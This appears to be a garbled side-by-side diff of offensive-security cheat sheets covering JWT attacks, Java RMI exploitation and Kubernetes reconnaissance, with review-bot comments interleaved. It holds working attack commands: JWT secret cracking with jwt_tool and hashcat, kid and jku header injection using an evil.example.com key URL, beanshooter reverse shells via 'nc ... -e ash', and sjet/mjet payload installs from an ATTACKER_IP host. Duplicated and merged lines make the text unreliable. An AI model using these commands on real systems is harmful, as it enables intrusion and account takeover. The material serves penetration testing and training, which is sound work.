{"kty": "RSA", "n": "sEFRQzskiSOrUYiaWAPUMF66YOxWymrbf6PQqnCdnUla8PwI4KDVJ2XgNGg9XOdc-jRICmpsLVBqW4bag8eIh35PClTwYiHzV5cbyW6W5hXp747DQWan5lIzoXAmfe3Ydw65cXnanjAxz8vqgOZP2ptacwxyUPKqvM4ehyaapqxkBbSmhba6160PEMAr4d1xtRJx6jCYwQRBBvZIRRXlLe9hrohkblSrih8MdvHWYyd40khrPU9B2G_PHZecifKiMcXrv7IDaXH-H_NbS7jT5eoNb9xG8K_j7Hc9mFHI7IED71CNkg9RlxuHwELZ6q-9zzyCCcS426SfvTCjnX0hrQ", "e": "AQAB"}
```
## JWT Secret
> To create a JWT, a secret key is used to sign the header and payload, which generates the signature. The secret key must be kept secret and secure to prevent unauthorized access to the JWT or tampering with its contents. If an attacker is able to access the secret key, they can create, modify or sign their own tokens, bypassing the intended security controls.
### Encode and Decode JWT with the secret
* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool):
```ps1
jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds
jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds -T
Token header values:
[+] alg = "HS256"
[+] typ = "JWT"
Token payload values:
[+] name = "John Doe"
```
* Using [pyjwt](https://pyjwt.readthedocs.io/en/stable/): `pip install pyjwt`
```python
import jwt
encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256')
jwt.decode(encoded, 'secret', algorithms=['HS256'])
```
### Break JWT secret
Useful list of 3502 public-available JWT: [wallarm/jwt-secrets/jwt.secrets.list](https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list), including `your_jwt_secret`, `change_this_super_secret_random_string`, etc.
#### JWT tool
First, bruteforce the "secret" key used to compute the signature using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
```powershell ```powershell
git clone https://github.com/ticarpi/jwt_tool python3 -m pip install termcolor cprint pycryptodomex requests
python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
Token header values:
[+] alg = HS256
[+] typ = JWT
Token payload values:
[+] sub = 1234567890
[+] role = user
[+] iat = 1516239022
File loaded: /tmp/wordlist
Testing 5 passwords...
[+] secret is the CORRECT key!
``` ```
Then edit the field inside the JSON Web Token. Then edit the field inside the JSON Web Token.
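Review bot: the manual RS256-to-HS256 steps need a caveat on the key bytes: `cat key.pem | xxd -p | tr -d "\\n"` produces hex ending in `0a`, i.e. the PEM's trailing newline is part of the HMAC key, but whether the vulnerable server keys its HMAC with or without that newline depends on how it loads the file, so a forged signature that is rejected should be retried with the trailing `0a` removed. Within a code block the quoting should be `tr -d "\n"`, not `"\\n"`. Step 3 relies on `python2`; `python3 -c "import base64,binascii;print(base64.urlsafe_b64encode(binascii.a2b_hex('<hex>')).decode().rstrip('='))"` does the same. Minor: `3. . In the dialog` has a doubled period, and `* Using [ticarpi/jwt_tool]` in the Key Injection section has no link target.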
@@ -170,8 +345,7 @@ Please enter new value and hit ENTER
[3] iat = 1516239022 [3] iat = 1516239022
[0] Continue to next step [0] Continue to next step
Please select a field number: Please select a field number (or 0 to Continue):
(or 0 to Continue)
> 0 > 0
``` ```
@@ -190,7 +364,7 @@ Please select an option from above (1-4):
Please enter the known key: Please enter the known key:
> secret > secret
Please enter the keylength: Please enter the key length:
[1] HMAC-SHA256 [1] HMAC-SHA256
[2] HMAC-SHA384 [2] HMAC-SHA384
[3] HMAC-SHA512 [3] HMAC-SHA512
@@ -201,34 +375,156 @@ Your new forged token:
[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic [+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
``` ```
### JWT cracker * Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`
* Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`
* Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
* Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`
* Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
```bash
git clone https://github.com/brendan-rius/c-jwt-cracker #### Hashcat
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
Secret is "Sn1f" > Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
* Dictionary attack: `hashcat -a 0 -m 16500 jwt.txt wordlist.txt`
* Rule-based attack: `hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule`
* Brute force attack: `hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6`
## JWT Claims
[IANA's JSON Web Token Claims](https://www.iana.org/assignments/jwt/jwt.xhtml)
### JWT kid Claim Misuse
The "kid" (key ID) claim in a JSON Web Token (JWT) is an optional header parameter that is used to indicate the identifier of the cryptographic key that was used to sign or encrypt the JWT. It is important to note that the key identifier itself does not provide any security benefits, but rather it enables the recipient to locate the key that is needed to verify the integrity of the JWT.
* Example #1 : Local file
```json
{
"alg": "HS256",
"typ": "JWT",
"kid": "/root/res/keys/secret.key"
}
```
* Example #2 : Remote file
```json
{
"alg":"RS256",
"typ":"JWT",
"kid":"http://localhost:7070/privKey.key"
}
```
The content of the file specified in the kid header will be used to generate the signature.
```js
// Example for HS256
HMACSHA256(
base64UrlEncode(header) + "." +
base64UrlEncode(payload),
your-256-bit-secret-from-secret.key
)
``` ```
### Hashcat The common ways to misuse the kid header:
* Get the key content to change the payload
* Change the key path to force your own
```py
>>> jwt.encode(
... {"some": "payload"},
... "secret",
... algorithm="HS256",
... headers={"kid": "http://evil.example.com/custom.key"},
... )
```
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065) * Change the key path to a file with a predictable content.
```ps1
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
python3 jwt_tool.py <JWT> -I -hc kid -hv "/proc/sys/kernel/randomize_va_space" -S hs256 -p "2"
```
```bash * Modify the kid header to attempt SQL and Command Injections
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
### JWKS - jku header injection
"jku" header value points to the URL of the JWKS file. By replacing the "jku" URL with an attacker-controlled URL containing the Public Key, an attacker can use the paired Private Key to sign the token and let the service retrieve the malicious Public Key and verify the token.
It is sometimes exposed publicly via a standard endpoint:
* `/jwks.json`
* `/.well-known/jwks.json`
* `/openid/connect/jwks.json`
* `/api/keys`
* `/api/v1/keys`
* [`/{tenant}/oauth2/v1/certs`](https://docs.theidentityhub.com/doc/Protocol-Endpoints/OpenID-Connect/OpenID-Connect-JWKS-Endpoint.html)
You should create your own key pair for this attack and host it. It should look like that:
```json
{
"keys": [
{
"kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54",
"kty": "RSA",
"e": "AQAB",
"n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ"
}
]
}
``` ```
**Exploit**:
* Using [ticarpi/jwt_tool]
```ps1
python3 jwt_tool.py JWT_HERE -X s
python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
```
* Using [portswigger/JWT Editor](#)
1. Generate a new RSA key and host it
2. Edit JWT's data
3. Replace the `kid` header with the one from your JWKS
4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked)
**Deconstructed**:
```json
{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}.
{"login":"admin"}.
[Signed with new Private key; Public key exported]
```
## Labs
* [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature)
* [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification)
* [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key)
* [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
* [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
* [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
## References ## References
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/cyberverse/five-easy-steps-to-understand-json-web-tokens-jwt-7665d2ddf4d5)
- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
- [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
- [Club EH RM 05 - Intro to JSON Web Token Exploitation - Nishacid](https://www.youtube.com/watch?v=d7wmUz57Nlg)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://web.archive.org/web/20220305042224/https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [Hacking JSON Web Tokens - medium.com Oct 2019](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
- [JSON Web Token Vulnerabilities - 0xn3va](https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
- [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
- [Write up JRR Token LeHack 2019 - 07/07/2019 - LAPHAZE](https://web.archive.org/web/20210512205928/https://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
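Review bot: the Burp extension link in the jku section, `* Using [portswigger/JWT Editor](#)`, points at `#`, so nothing is actually linked; replace `#` with the extension's real URL (the jwt_tool bullet above it links correctly). Two documentation points in the same region: the kid and jku subsections explain the misuse but never state the control a reader should look for, so one line saying that `kid` must be matched against a server-side allowlist of key identifiers and never used as a file path, URL or query fragment, and that `jku` must be restricted to pinned, pre-approved JWKS URLs, would make "JWT Claims" and "JWKS - jku header injection" useful on the defensive side as well. Also, the "Remote file" kid example names the fetched file `privKey.key`, but what the service loads through `kid` is the key it verifies with, so a neutral name (`key.pem`, `verify.key`) would avoid confusing readers.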

Java RMI/README.md Normal file

@@ -0,0 +1,141 @@
# Java RMI
> Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
## Summary
* [Tools](#tools)
* [Detection](#detection)
* [Exploitation](#exploitation)
* [RCE using beanshooter](#rce-using-beanshooter)
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
* [RCE using Metasploit](#rce-using-metasploit)
* [References](#references)
## Tools
- [siberas/sjet](https://github.com/siberas/sjet)
- [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
## Detection
* Using [nmap](https://nmap.org/):
```powershell
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
1089/tcp open java-rmi Java RMI
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
```
* Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
```bash
$ rmg scan 172.17.0.2 --ports 0-65535
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC)
[+] [6234 / 6234] [#############################] 100%
[+] Portscan finished.
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
[...]
```
* Using Metasploit
```bash
use auxiliary/scanner/misc/java_rmi_server
set RHOSTS <IPs>
set RPORT <PORT>
run
```
## Exploitation
If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
### RCE using beanshooter
* List available attributes: `beanshooter info 172.17.0.2 9010`
* Display value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose`
* Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean`
* Bruteforce a password protected JMX service: `beanshooter brute 172.17.0.2 1090`
* List registered MBeans: `beanshooter list 172.17.0.2 9010`
* Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000`
* Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
* Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
* Invoke arbitrary public and static Java methods:
```ps1
beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
```
* Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
* Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
### RCE using sjet or mjet
#### Requirements
- Jython
- The JMX server can connect to a http service that is controlled by the attacker
- JMX authentication is not enabled
#### Remote Command Execution
The attack involves the following steps:
* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
* Creating a instance of the MBean `javax.management.loading.MLet` on the target server, using JMX
* Invoking the `getMBeansFromURL` method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
* The attacker finally invokes methods from the malicious MBean.
Exploit the JMX using [siberas/sjet](https://github.com/siberas/sjet) or [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
```powershell
jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
jython sjet.py TARGET_IP TARGET_PORT super_secret shell
jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
```
### RCE using Metasploit
```bash
use exploit/multi/misc/java_rmi_server
set RHOSTS <IPs>
set RPORT <PORT>
# configure also the payload if needed
run
```
## References
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
* [JMX RMI MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi--multiple-applications-remote-code-execution.pdf)
* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
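Review bot: the Requirements list under "RCE using sjet or mjet" states `JMX authentication is not enabled`, but the mjet line `jython mjet.py --jmxrole admin --jmxpassword adminpassword ...` and the beanshooter `brute` and `--username admin --password admin` lines all depend on credentials, so the requirement should read "JMX authentication is disabled, or valid credentials are known". Fence languages are inconsistent: the nmap block and the sjet/mjet block are tagged `powershell` although they are Linux shell commands and output, while the rmg and Metasploit blocks use `bash`; use `bash` throughout. Typos in the Remote Command Execution steps: `Creating a instance` should be `Creating an instance`, `downloads and loades` should be `downloads and loads`, and in Requirements `a http service` should be `an HTTP service`.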

Kubernetes/README.md Normal file

@@ -0,0 +1,303 @@
# Kubernetes
> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
## Summary
- [Tools](#tools)
- [Container Environment](#container-environment)
- [Information Gathering](#information-gathering)
- [RBAC Configuration](#rbac-configuration)
- [Listing Secrets](#listing-secrets)
- [Access Any Resource or Verb](#access-any-resource-or-verb)
- [Pod Creation](#pod-creation)
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
- [Privileged Service Account Token](#privileged-service-account-token)
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
- [API addresses that you should know](#api-addresses-that-you-should-know)
- [References](#references)
## Tools
* [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns
* [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources
* [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/)
* [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters
* [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios
* [kubescape](https://github.com/armosec/kubescape) - Automate Kubernetes cluster scans to identify security issues
## Container Environment
Containers within a Kubernetes cluster automatically have certain information made available to them through their [container environment](https://kubernetes.io/docs/concepts/containers/container-environment/). Additional information may have been made available through the volumes, environment variables, or the downward API, but this section covers only what is made available by default.
### Service Account
Each Kubernetes pod is assigned a service account for accessing the Kubernetes API. The service account, in addition to the current namespace and Kubernetes SSL certificate, are made available via a mounted read-only volume:
```
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
If the `kubectl` utility is installed in the container, it will use this service account automatically and will make interacting with the cluster much easier. If not, the contents of the `token` and `namespace` files can be used to make HTTP API requests directly.
### Environment Variables
The `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` environment variables are automatically provided to the container. They contain the IP address and port number of the Kubernetes master node. If `kubectl` is installed, it will use these values automatically. If not, the values can be used to determine the correct IP address to send API requests to.
```
KUBERNETES_SERVICE_HOST=192.168.154.228
KUBERNETES_SERVICE_PORT=443
```
Additionally, [environment variables](https://kubernetes.io/docs/concepts/services-networking/service/#discovering-services) are automatically created for each Kubernetes service running in the current namespace when the container was created. The environment variables are named using two patterns:
- A simplified `{SVCNAME}_SERVICE_HOST` and `{SVCNAME}_SERVICE_PORT` contain the IP address and default port number for the service.
- A [Docker links](https://docs.docker.com/network/links/#environment-variables) collection of variables named `{SVCNAME}_PORT_{NUM}_{PROTOCOL}_{PROTO|PORT|ADDR}` for each port the service exposes.
For example, all of the following environment variables would be available if a `redis-master` service were running with port 6379 exposed:
```
REDIS_MASTER_SERVICE_HOST=10.0.0.11
REDIS_MASTER_SERVICE_PORT=6379
REDIS_MASTER_PORT=tcp://10.0.0.11:6379
REDIS_MASTER_PORT_6379_TCP=tcp://10.0.0.11:6379
REDIS_MASTER_PORT_6379_TCP_PROTO=tcp
REDIS_MASTER_PORT_6379_TCP_PORT=6379
REDIS_MASTER_PORT_6379_TCP_ADDR=10.0.0.11
```
### Simulating `kubectl` API Requests
Most containers within a Kubernetes cluster won't have the `kubectl` utility installed. If running the [one-line `kubectl` installer](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) within the container isn't an option, you may need to craft Kubernetes HTTP API requests manually. This can be done by using `kubectl` *locally* to determine the correct API request to send from the container.
1. Run the desired command at the maximum verbosity level using `kubectl -v9 ...`
1. The output will include HTTP API endpoint URL, the request body, and an example curl command.
1. Replace the endpoint URL's hostname and port with the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` values from the container's environment variables.
1. Replace the masked "Authorization: Bearer" token value with the contents of `/var/run/secrets/kubernetes.io/serviceaccount/token` from the container.
1. If the request had a body, ensure the "Content-Type: application/json" header is included and send the request body using the customary method (for curl, use the `--data` flag).
For example, this output was used to create the [Service Account Permissions](#service-account-permissions) request:
```powershell
# NOTE: only the Authorization and Content-Type headers are required. The rest can be omitted.
$ kubectl -v9 auth can-i --list
I1028 18:58:38.192352 76118 loader.go:359] Config loaded from file /home/example/.kube/config
I1028 18:58:38.193847 76118 request.go:942] Request Body: {"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}
I1028 18:58:38.193912 76118 round_trippers.go:419] curl -k -v -XPOST -H "Accept: application/json, */*" -H "Content-Type: application/json" -H "User-Agent: kubectl/v1.14.10 (linux/amd64) kubernetes/f5757a1" 'https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews'
I1028 18:58:38.295722 76118 round_trippers.go:438] POST https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 201 Created in 101 milliseconds
I1028 18:58:38.295760 76118 round_trippers.go:444] Response Headers:
...
```
## Information Gathering
### Service Account Permissions
The default service account may have been granted additional permissions that make cluster compromise or lateral movement easier.
The following can be used to determine the service account's permissions:
```powershell
# Namespace-level permissions using kubectl
kubectl auth can-i --list
# Cluster-level permissions using kubectl
kubectl auth can-i --list --namespace=kube-system
# Permissions list using curl
NAMESPACE=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/namespace")
# For cluster-level, use NAMESPACE="kube-system" instead
MASTER_URL="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
TOKEN=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/token")
curl "${MASTER_URL}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
--cacert "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" \
--header "Authorization: Bearer ${TOKEN}" \
--header "Content-Type: application/json" \
--data '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'${NAMESPACE}'"}}'
```
### Secrets, ConfigMaps, and Volumes
Kubernetes provides Secrets and ConfigMaps as a way to load configuration into containers at runtime. While they may not lead directly to whole cluster compromise, the information they contain can lead to individual service compromise or enable lateral movement within a cluster.
From a container perspective, Kubernetes Secrets and ConfigMaps are identical. Both can be loaded into environment variables or mounted as volumes. It's not possible to determine if an environment variable was loaded from a Secret/ConfigMap, so each environment variable will need to be manually inspected. When mounted as a volume, Secrets/ConfigMaps are always mounted as read-only tmpfs filesystems. You can quickly find these with `grep -F "tmpfs ro" /etc/mtab`.
